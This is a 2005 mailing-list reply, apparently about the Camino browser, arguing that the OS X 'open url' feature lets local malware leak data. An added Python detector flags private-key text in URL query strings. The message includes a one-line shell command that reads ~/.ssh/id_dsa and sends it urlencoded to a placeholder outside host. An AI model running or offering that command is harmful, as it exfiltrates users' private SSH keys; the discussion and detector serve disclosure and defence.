On 07.03.2005, at 18:26, Simon Fraser wrote:
I'm not exactly sure what your concern is here. If it's possible to get personal data from your machine via a URL load (with or without a GET request) then that's a bug that should be filed and fixed. The fact that a URL load originated from an AppleEvent doesn't make any difference in terms of what it can do.
Simon
What I mean is this, here is a quick and dirty example:
cat ~/.ssh/id_dsa | php -r 'while(!feof(STDIN)) $c .= fread(STDIN,256); echo "http://some.host.on.the.internet/?haha=".urlencode($c);' | xargs open
Of course, when this happens I must assume that the "malware" has already landed on my machine, and thus can act from there. So you are perfectly right in saying the problem should be "fixed earlier" (by downloading and installing only "trustworthy" software, and not opening suspicious mails, etc).
If anything still does land on my Mac (for whatever reason, be it an unresolved bug in Mail, or anything), "open url" is an open door with no means for closing it (except by using extremely uncomfortable tricks):
I'm not sure I'll be fast enough with a 'killall Camino' or Force Quit by the time my favorite fastest browser on Mac OS X has launched and opened the url.
IMHO, in a world in which a cookie is a potential privacy threat, we should also consider the open url feature one.
:)
Lorenzo
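An added example, not part of the original message and not Camino code: a check that a URL-handling wrapper or log review could run to spot the pattern discussed above, where file contents are urlencoded into a query parameter of a URL handed to the browser. The function name, the length threshold and the sample key text are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, quote_plus

# PEM armor line that opens a private key file such as ~/.ssh/id_dsa.
PEM_PRIVATE_KEY = re.compile(r"-----BEGIN (?:[A-Z0-9]+ )*PRIVATE KEY-----")
# Assumed threshold: a query value this long is unusual for a URL
# opened on the user's behalf by another program.
MAX_VALUE_LEN = 512


def inspect_url(url):
    """Return a list of (parameter, reason) findings for one URL."""
    findings = []
    query = urlsplit(url).query
    # parse_qsl percent-decodes names and values, undoing urlencode().
    for name, value in parse_qsl(query, keep_blank_values=True):
        if PEM_PRIVATE_KEY.search(value):
            findings.append((name, "private key material"))
        elif len(value) > MAX_VALUE_LEN:
            findings.append((name, "oversized value"))
    return findings


# Constructed sample: placeholder text shaped like a key file, not a real key.
CONSTRUCTED_KEY_TEXT = (
    "-----BEGIN DSA PRIVATE KEY-----\n"
    "CONSTRUCTED-PLACEHOLDER-NOT-A-KEY\n"
    "-----END DSA PRIVATE KEY-----\n"
)
SAMPLE_FLAGGED_URL = (
    "http://some.host.on.the.internet/?haha=" + quote_plus(CONSTRUCTED_KEY_TEXT)
)
SAMPLE_BENIGN_URL = "http://example.org/search?q=camino+browser"

if __name__ == "__main__":
    for candidate in (SAMPLE_FLAGGED_URL, SAMPLE_BENIGN_URL):
        print(candidate[:60], inspect_url(candidate))
```

A check like this only sees URLs that pass through it; it does not address malware that sends data over its own connection.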
